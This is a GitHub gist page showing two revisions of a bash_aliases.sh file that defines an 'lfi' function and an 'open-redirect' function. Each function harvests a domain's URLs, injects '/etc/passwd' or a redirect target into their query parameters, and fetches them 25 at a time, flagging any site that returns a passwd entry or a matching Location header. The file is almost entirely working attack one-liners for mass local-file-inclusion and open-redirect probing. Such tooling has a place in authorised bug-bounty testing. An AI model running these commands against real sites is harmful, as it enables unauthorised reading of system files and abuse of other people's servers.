Skip to content

Instantly share code, notes, and snippets.

@BlasterX24
Forked from dwisiswant0/bash_aliases.sh
Created August 17, 2020 04:58
Show Gist options
  • Save BlasterX24/70d4b1779a76c65b8bb7fb611d0c4720 to your computer and use it in GitHub Desktop.
Save BlasterX24/70d4b1779a76c65b8bb7fb611d0c4720 to your computer and use it in GitHub Desktop.

Revisions

  1. @dwisiswant0 dwisiswant0 revised this gist Aug 17, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion bash_aliases.sh
    Original file line number Diff line number Diff line change
    @@ -1,5 +1,5 @@
    lfi() {
    gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
    gau $1 | gf redirect | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
    }

    open-redirect() {
  2. @dwisiswant0 dwisiswant0 created this gist Aug 17, 2020.
    7 changes: 7 additions & 0 deletions bash_aliases.sh
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,7 @@
    lfi() {
    gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
    }

    open-redirect() {
    local LHOST="http://localhost"; gau $1 | gf lfi | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
    }